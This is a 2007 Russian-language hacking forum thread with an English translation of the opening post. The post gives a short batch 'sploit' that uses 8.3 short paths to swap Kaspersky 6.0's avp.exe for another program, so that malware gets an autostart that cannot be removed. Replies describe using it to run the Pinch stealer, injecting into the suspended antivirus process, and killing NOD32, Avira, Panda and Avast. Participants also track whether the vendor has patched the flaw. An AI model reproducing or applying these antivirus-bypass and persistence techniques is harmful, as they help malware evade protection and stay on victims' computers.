PDA

Просмотр полной версии : Автозагрузку by Каспер


hidden
08.01.2007, 10:07
How to kick Kasper out, set a program for startup and make it unremovable

Sound's like something very useful, simultaneously trivial easily. :)

Ones I’ve installed a Kasper(Kaspersky Antivirus) for experiments, began experimenting with API hooks and found out, that Kasper hook them in the ring0, then I stopped experiments with ring0 and began experiments with something else(doesn’t metter what), but Kasper was continue annoying me by its annoying alerts, so I open task-manager and “Delete”, but it shows my “Access denied”. And I got an idea that if I’d name my program “avp.exe”, it’d become unkillable, it didn’t work. Then I decided to rename Kasper and put my program instead, but it again screaming “denied”, I couldn’t even just copy my file into its folder. So I did it a little different, code snip bellow.

After reboot, notepad sowed up instead of Kasper but its folder was still protected, and user’s methods couldn’t delete/rename it. :)
It’s possible by the end of your dirty job run Kasper and it’ll work like nothing happened, you can even build your own loader, that will execute Kasper suspended, inject into it, and then lat it protect itself with your code inside, It’d by not only unkillable, but unremovable and had access to the Internet ;)

The vulnerability is, because filter file-system access in ring0 by long names to its folded, but doesn’t give a shit about FORMAT 8.3, that every windows system support :)

When they close the hole, I’ll give another method, (2 lines longer :D ) if it’d still be working. ;)

Sorry, English version was a little late, but not they said that not so many people using it, so I think that English version would help a little :D

Good luck with trojanization…

Как снести каспера, добавив свою прогу в автозагрузку, при этом сделав её не удаляемой

Звучит очень полезно, приэтом тривиально просто. :)

Поставил я себе каспера(для экспериментов :) ) ну и начал экспериментировать с перехватом АПИ, оказалось он их в нулевом кольце перехватывает, тогда я отложил эксперименты с нулевым кольцом и начал экспериментировать с кое-чем другим(не важно с чем), но каспер продолжал мешать, своими назойливыми окнами, ну я зашел в список процессов и делет, а он мне Эксес Денайд, я подумал почему бы не переименовать свою прогу в avp.exe, может она тоже станет не убиваемая. Не прокатило. Тогда я решил переименовать каспера и записать её на его место, а он мне опять кричит Эксес Денайд. Даже просто файл скопировать в свою папку не дал. Тогда я сделал так:
rem Sploit by hidden for kasper 6.0

set kasper=%ProgramFiles%\KASPER~1\KASPER~1.0
move "%kasper%\avp.exe" "%kasper%\avpx.exe"
copy "%windir%\system32\notepad.exe" "%kasper%\avp.exe"
При загрузке, вместо каспера стал появляться блокнот, при этом сама папка, в которой он лежит, осталась защищённая, и его из неё юзерскими методами не удалить. :)
Можно также из своей программы по окончанию своих грязных дел запустить каспера и он заработает в своём нормальном режиме, а при большом желании можно ещё и лоадер сделать, который бы его запускал остановленым, инжектился внутрь, ресюмил бы его тред. Тогда бы он был бы не только не удалаемым, но и не убиваемым, причём с разрешением доступа в интернет ;) так что жерзайте, пока они дырачку не прикрыли :)

Косяк весь в том, что его драйвер сидя у себя в нулевом кольце и фильтруя АПИ, на совпадение с именем своей директории, считает себя богом винды и даже не утруждает себя проверять пути в формате 8.3 :)

Когда закроют дырачку, поделюсь другим способом(длинее на 2 строки :D ), если он всё ещё будет работать. ;)

Удачной троянизации...

hidden
10.04.2007, 00:15
Это же надо, прошло 3 месяца, а баг всё-ещё не по фиксили, M$ и то оперативнее реагируют :)

Если сплоит перестанет работать, плиз сообщите, чтоб я следующий выложил, просто не хочется ставить себе такую махину, чтоб узнать что они всё-ещё ничего не решили :)

ЗЫ Неужели они не читают наш форум :)

gold-goblin
11.04.2007, 19:41
Круто, я так пинча теперь запускаю.
Я слышал что в кьюк фаерволе есть дырка в файле feedback.exe через нее вирус на комп проползает. И скрывается от сканирования антивирусами.

Как использовать эту багу я не знаю :mad:

Y.Dmitriy
11.04.2007, 20:01
дядя Каспер, дядя Каспер стоп-сигнальніе огни...

AlexI
22.04.2007, 21:12
тока процесс полюбэ удаляется (((

hidden
22.04.2007, 21:51
тока процесс полюбэ удаляется (((Процесс то удаляется, зато сама папка и этот файл защищены, там-же и логи хранить можно, чтоб не удаляли :D

gold-goblin
23.04.2007, 21:32
hidden

А случием ты не знаеш как сделать чтоб процесс нашего вируса под видом каспера не кикался??

hidden
23.04.2007, 22:17
Каспер включает защиту когда загружается, как вариант, запустить его остановленным, проинжектится внутрь, а потом разрешить ему включить защиту)) Но я не проверял этот вариант.

gold-goblin
24.04.2007, 17:20
Сегодня если будет время проверю.

Ta2i4
26.10.2007, 09:16
Уже тестируется 7.0.1. В сборке 7.0.1.254 Beta еще не исправили.

onikishov
27.10.2007, 14:23
hidden, есть идеи насчет NOD32? у меня его не получается выключить в процессах, он защищен.

hidden
27.10.2007, 18:37
hidden, есть идеи насчет NOD32? у меня его не получается выключить в процессах, он защищен.Я его не проверял, будет время, может попробую.

_SploiT_
31.10.2007, 23:50
Я его не проверял, будет время, может попробую.
Очень будет кстате! Будем ждать

radioelectron
02.11.2007, 17:39
Когда закроют дырачку, поделюсь другим способом (длинее на 2 строки :D ), если он всё ещё будет работать. ;)

Дырочку закрыли в КИС 8. При запуске батника пишет: "В доступе отказано". Хотелось бы услышать о втором способе. :)
И еще интересуют НОД с Доктором Вебом - есть ли в них дырки какие-нибудь? :confused:

Piflit
02.11.2007, 17:47
КИС 8 ??

radioelectron
02.11.2007, 17:49
КИС 8 ??
Дистр (ftp://devbuilds.kaspersky-labs.com/devbuilds/8.0.0.33/KIS/Beta/kis.en.msi)

Release notes (ftp://devbuilds.kaspersky-labs.com/devbuilds/8.0.0.33/KIS/Beta/release_notes_ru.txt)

Piflit
02.11.2007, 18:31
я бы не стал делать какие-либо выводы, опираясь на beta версию.

radioelectron
02.11.2007, 18:33
я бы не стал делать какие-либо выводы, опираясь на beta версию.
Ну не прокатывает батник с 8-кой. Пофиксили эту багу с 8.3-путями. Вот и хочется узнать о втором способе.

Lamia
02.11.2007, 21:15
А побруй сам!Уверена что там можно найти и ещё что нить интересное!

hidden
02.11.2007, 22:30
Зачем обманываешь?, батник работает как часы, во всяком случае на том каспере, что по ссылке выше :)

Это самый удобный способ, я не буду палить другой, пока не подтвердится, что этот не работает. ;)

ХЕК Техническая сложность :D
хттп://forum.kaspersky.com/index.php?showtopic=50136

radioelectron
03.11.2007, 00:00
Зачем обманываешь?, батник работает как часы, во всяком случае на том каспере, что по ссылке выше :)

Могу видео записать с подтверждением того, что не работает. Ты в какой операционке это проверял?
А побруй сам!Уверена что там можно найти и ещё что нить интересное!
НОД выносится батником - просто было интересно - есть ли еще какой способ. А вот с Доктором сложнее - ГУЙ выносится начисто, а драйвер сидит в памяти и блокирует вирусню :(

hidden
03.11.2007, 00:12
Windows XP SP2 (No hotfixes)
Я сам 2х секундное видео могу снять, как он сносится ;)

radioelectron
03.11.2007, 00:17
Windows XP SP2 (No hotfixes)
Я сам 2х секундное видео могу снять, как он сносится ;)
Давай. :)

hidden
03.11.2007, 00:39
Пожалуйста: хттп://rapidshare.com/files/67012240/SturtUp_by_Kasper.rar
:)

z01b
03.11.2007, 01:50
Есть исходник на асме на тему "Как убить НОД32", писал сам.
Если когото интересует, стучите!

radioelectron
03.11.2007, 01:52
Пожалуйста: хттп://rapidshare.com/files/67012240/SturtUp_by_Kasper.rar
:)
Черт. В русскоязычной ХРе не срабатывает. Сейчас опробовал на англоязычной - все пашет. :rolleyes:

hidden
03.11.2007, 02:05
Что, правда в Русскоязычной не пашет?
Ща поставлю, проверю :)

Если они только Русскую пофиксили, то я точно не зря перевод на English написал :D

z01b
03.11.2007, 02:17
Что, правда в Русскоязычной не пашет?
Ща поставлю, проверю :)

Если они только Русскую пофиксили, то я точно не зря перевод на English написал :D
Значит скоро и English профиксят )
Иди знай скоко кодеров дяди Каспера, водяться на ачате ночами )

hidden
03.11.2007, 02:34
Значит скоро и English профиксят )Они эту не хотели фиксить(почитай ихний форум), так-как они считают, что это снизит (и так не слишком хорошую из за остальных проверок, достаточто только почитать Release notes)производительность файловой системы, почти в 3 раза :D

z01b
03.11.2007, 02:44
Они эту не хотели фиксить(почитай ихний форум), так-как они считают, что это снизит (и так не слишком хорошую из за остальных проверок, достаточто только почитать Release notes)производительность файловой системы, почти в 3 раза :D
:eek: да ну нах ) в 3 раза ) эт ппц )

hidden
03.11.2007, 03:02
:eek: да ну нах ) в 3 раза ) эт ппц )Та не, это я читал не внимательно, они говорили сделать 8 проверок, вместо одной :D
Итак, данная уязвимость нам известна. К сожалению, исправление её повлечёт замедление ВСЕХ операций с файловой системой, т.к. при этом будет происходить как минимум 8 (а не 1!) проверок на соответствие защищаемым путям. При принятии решений о реализации той или иной функциональности мы всегда рассматриваем максимальное число аспектов, на которые это решение может повлиять. Так было и при обсуждении данного вопроса несколько месяцев назад. На настоящий момент времени число вредоносных программ, которые используют данную уязвимость, крайне мало... Однако, вынесение данного вопроса на публичное обсудение не оставляет нам выбора - мы обсудим возможность выпуска хот-фиксов для закрытия уязвимости в понедельник. К сожалению, как я сказал, это будет иметь также неприятные дополнительные эффекты.

Piflit
03.11.2007, 03:12
мы обсудим возможность выпуска хот-фиксов для закрытия уязвимости в понедельник
доживем до понедельника?

z01b
03.11.2007, 03:27
Та не, это я читал не внимательно, они говорили сделать 8 проверок, вместо одной :D
Я уш испугался, а то у меня у самого стоит КИС )

hidden
03.11.2007, 03:28
доживем до понедельника?После этого поста уже несколько понедельников прошло ;)

Кстати, логика супер: Узнать о баге, не только не фиксить, но и спрятать на несколько месяцев от пользователей, когда предотвратить её может практически каждый, установив Каспера в папку с коротким именем, но они не могут сделать это по умолчанию, так-как быть M$-сертифицированным, намного важнее безопасности :D

В 8-ом они его похоже глубже прописали, так-что методы(да, остальные тоже) уже не работают.

Piflit
03.11.2007, 16:49
hidden можно поподробнее про короткие и длинные имена?

hidden
03.11.2007, 21:48
hidden можно поподробнее про короткие и длинные имена?А что собственно про них подробнее? Винды их поддерживают только для совместимости с 16ти-битными ДОС приложениями, формат называется 8.3, потому-что длина имени файл или папки не может превышать 8 символов, а расширение 3 символа, поэтому придумали способ сокращать эти имена с использованием символа "~" с последующей цифрой, посмотреть их можно коммандой "dir /x", подробнее смотри в спецификации файловых систем FAT, FAT32

Кстати, осталась возможность полного отключения Каспера после перезагрузки, единственная проблема, до неё ещё продержаться надо, а он все автозагрузки палит :)

gold-goblin
04.11.2007, 02:14
нашел тамже интересные батники для авиры, Панды, Аваст, Нод. Проверить сам не могу так как их у меня нет.
Воть ссылка http://forum.kaspersky.com/index.php?s=&showtopic=50136&view=findpost&p=452478

radioelectron
13.11.2007, 21:31
нашел тамже интересные батники для авиры, Панды, Аваст, Нод. Проверить сам не могу так как их у меня нет.
Воть ссылка http://forum.kaspersky.com/index.php?s=&showtopic=50136&view=findpost&p=452478
Все работает :) Сам снимал. :)

MOSYA
16.11.2007, 00:39
Люди... а зачем вам Касперыча с Процессов Снимать, не легче его Базы грохнуть :)
И также с Остальными.....

gold-goblin
21.11.2007, 13:44
Mosya

а ты попробуй удоли базы касперского когда он работает. Если получится то отпишись тут, а так это не реально так как защита касперского не дает ничего удалять из своей папки.